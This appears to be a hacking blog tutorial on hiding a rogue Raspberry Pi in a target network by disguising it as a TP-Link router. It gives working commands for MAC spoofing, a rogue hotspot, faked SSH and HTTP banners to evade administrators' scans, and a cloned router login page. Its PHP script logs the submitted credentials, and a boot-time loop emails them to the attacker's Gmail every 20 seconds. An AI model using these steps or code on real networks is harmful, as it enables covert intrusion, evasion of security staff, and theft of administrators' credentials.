Masking raspberry pi to look like and act like a router

This post continuous the story of infiltration in local network onsite with Raspberry pi (link).

When you infiltrate in some serious network, where they have good security team and where system admins do their job on the right way, it is just a manner of time when they will detect your hacking gadget. I mean, when the system admin perform regular scan of the network, and he found new device raspberry pi. Well, I think that we can all imagine the expression on his face. So it is very smart to mask the Pi to looks like something else; like printer, router, windows pc, etc. This will definitely trigger less attention.

In this post I will focus on how to mask raspberry pi to looks like and act like a router. In my case it will looks like TP-Link router. I will also create phishing page for router settings page, with the purpose to catch admins credentials, in the case if he found me and try to login. And I will also set that harvested credentials would be sent on my email.

For the purpose of this post I used raspberry pi w zero with attached two usb wifi antennas.

Here are brief steps we will focus on:

• MAC spoof of both antennas
• Creating of wifi hotspot (password protected and unprotected)
• Hiding of debian version on ssh protocol
• Changing of service name on port 80
• Creating of phishing page – router settings page
• Setting email to receive harvested credentials

1. MAC spoof

Change the MAC address for the both antennas, with the TP-Link Technologies address. Type the following commands

ifconfig wlan1 down
macchanger -m f8:d1:11:2a:24:a3
ifconfig wlan1 up

ifconfig wlan2 down
macchanger -m f8:d1:11:2a:24:a4
ifconfig wlan2 up

service network-manager restart

Note: after reboot the MAC address will be restored to original MAC address, so the best way to keep the spoofed MAC address is to create script which will run after each boot up.

2. Creating wifi hotspot

You can create password protected or unprotected wifi hotspot. For unprotected one I found great tool on github, which is really easy to set up, while creating password protected is a lit a bit more time consuming.

2.1. Password unprotected wifi hotspot

git clone https://github.com/oblique/create_ap
cd create_ap
make install

systemctl start create_ap

create_ap wlan2 wlan1 MyAccessPoint

2.2. Password protected wifi hotspot

Download and install hostapd and dnsmasq.

sudo apt-get install hostapd
sudo apt-get install dnsmasq
service hostapd stop
service dnsmasq stop

Define the hotspot interface and IP ranges in the /etc/dnsmasq.conf.

interface=wlan2mon
dhcp-range=192.168.2.2,192.168.2.20,255.255.255.0,24h

Change the following settings in /etc/hostapd.conf. To define your wifi name change the ssid, and to define password change wpa_passphrase. Also be careful to set the your interface.

interface=wlan2mon
driver=nl80211
ssid=Wifi-name
hw_mode=g
channel=7
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Note: To make my wifi hotspot working I needed to put my wifi adapter in monitoring mode, otherwise did not work. I done it with teh following command.

airmon-ng start wlan2

You also need to tell to hostapd where the default configuration file is stored. Add the following lines in /etc/default/hostapd.

nano /etc/default/hostapd
DAEMON_CONF=”/etc/hostapd.conf”

Now start up the services:

service hostapd start
service dnsmasq start

Now your hotspot is created but still does not provide you internet access. So, next you need to configure routing between both wifi adapters. In my case wlan1 is connected to the internet, while wlan2 is used for wifi hotspot.

Uncomment the next line to enable packet forwarding for IPv4 in /etc/sysctl.conf.

net.ipv4.ip_forward=1

Run the following command to activate forwarding:

sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”

Turn the raspberry pi into the router:

iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o wlan2mon -m state –state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan2mon -o wlan1 -j ACCEPT

After that save the routing tables into the /etc/iptables.ipv4.nat:

sh -c “iptables-save > /etc/iptables.ipv4.nat”

The following line will restore the routing table whenever the raspberry pi is booted. But in my case was not restored, due to restoring at boot up was performed before wlan2 was putted in monitoring mode (wlan2mon), and practically did not exist yet. But maybe in some circumstances or cases it would work if you figure out to make hotspot running without monitoring mode. However, her is the line which should be added in /etc/network/interfaces.

pre-up iptables-restore < /etc/iptables.ipv4.nat

For the end you need to create bash script which will start up your hotspot. In my case I created hotspot.sh.

!#/bin/bash
ifconfig wlan2mon 192.168.2.1
service dnsmasq restart
hostapd /etc/hostapd.conf

3. Changing of service name on port 22 and 80

For port 22 you should hide debian version on ssh, so it will not look suspicious in association between router and debian distro. To do this, add the following line in /etc/ssh/sshd_config.

DebianBanner no

Next, change apache2 service name. Why we should change it. Well, when you perform scan on the router it is not common to see that apache service is running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.

Install the following:

apt-get update
apt-get install libapache-mod-security
a2enmod mod-security

In the /etc/apache2/conf-enabled/security.conf add following line:

SecServerSignature ‘TP-LINK WR841N WAP http config’

Restart the apache2:

service apache2 restart

Ok, let’s scan raspberry pi to see how convincingly looks like.

Well, it looks convincingly for me.

4. Creating of phishing page – router settings page

With the WebScrpBook plugin capture the page source and put it in the /var/www/html.

After that modify the index.html file. You should modify it by adding/changing action in the form part (action=”action.php”). This function will run action.php after submition and trying login.

Create the action.php file and save it in /var/www/html.

<?php
$location='/error';
header("Location: " . "http://" . $_SERVER['HTTP_HOST'] . $location);
$handle = fopen("pass.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>

So in this code you can see that after login it will redirect you to /error folder. In this folder you can create new index.html file which will render e.g. you have no authority to access this router. All harvested credentials will be saved in pass.txt file.

5. Setting email to receive harvested credentials

To receive harvested credentials on your email (Gmail account) you can use ssmtp.

Install ssmtp:

apt-get install ssmtp

Then, add the following lines in configuration file /etc/ssmtp/ssmtp.conf. Change AuthUser and AuthPass lines.

hostname=localhost
UseSTARTTLS=YES
root=prodevtool@gmail.com
mailhub=smtp.gmail.com:587
FromLineOverride=YES
AuthUser=youreamail@gmail.com
AuthPass=Password
UseTLS=YES

Note: In the gmail account settings you need to allow less secure apps to access your account.

Now you need to create script and make it to run on boot up, which will every 20 sec check, if pass.txt file exist, and If exist it will grep username and password from it and sent to your gmail account.

!#/usr/bin/bash
while sleep 20
do
if [ -f /var/www/html/pass.txt ]
then grep -e user -e pass /var/www/html/pass.txt | ssmtp youreamail@gmail.com
rm -f /var/www/html/pass.txt
fi
done